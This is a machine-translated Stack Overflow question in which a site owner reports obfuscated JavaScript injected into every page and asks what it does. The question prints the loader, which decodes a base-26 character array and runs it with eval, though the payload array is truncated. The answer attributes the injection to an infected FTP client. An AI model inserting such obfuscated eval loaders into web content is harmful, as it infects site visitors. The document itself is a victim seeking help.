首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >网站安全-被这个JS脚本破解

网站安全-被这个JS脚本破解
EN

Stack Overflow用户
提问于 2013-04-01 04:22:09
回答 1查看 683关注 0票数 1

我们的站点托管在一个相当受欢迎的.NET托管提供商上。所以我认为它是安全的,问题就在我们这一边。如果我错了,请告诉我。

我从我的网站上收到投诉,说里面有病毒。所以我去看看主页。

我注意到,在每一页,我们有以下额外的脚本在页面底部!

代码语言:javascript
复制
<script>
try{document["b"+"o"+"d"+"y"]*=document}
catch(dgsgsdg){zxc=12;ww=window;}
try{d=document["createElement"]("span");}
catch(agdsg){zxc=0;}
try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}
catch(bawetawe){if(ww.document){v=window;
n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h" .... ];
//truncated for security reasons

h=2;s="";if(zxc){for(i=0;i-632!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}</script><script>try{window.document.body/=2}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;
n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h" .... ];
//truncated for security reasons

h=2;s="";if(zxc){for(i=0;i-632!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"]
(parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}
</script></body>

只是我知道密码,我发誓不会给任何人。密码是随机的,符合安全标准,我们每年修改一次密码,我不知道很频繁,但我想它是可以的。

问题如下:

  1. 这个剧本在做什么?我如何逆向设计n=“9”.阵列?我想找个线索。
  2. 我们以什么方式搞砸了让黑客进来?在这种情况下,除了布鲁斯强制我们的密码并得到幸运之外,他还能做其他事情吗?
EN

回答 1

Stack Overflow用户

回答已采纳

发布于 2013-04-01 06:22:55

每页底部的片段通常表示您的FTP程序已被感染,需要删除/更改。

虽然我不是百分之百肯定,但我认为技术是正确的。我用来上传网站的FTP软件一定是被感染了。我不知道它是如何发生的,但它现在已经崩溃,不再在操作系统中工作了。

票数 1
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/15737580

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档